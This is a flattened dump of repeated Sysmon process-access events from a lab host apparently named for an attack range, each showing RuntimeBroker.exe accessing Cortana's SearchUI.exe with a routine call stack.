12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 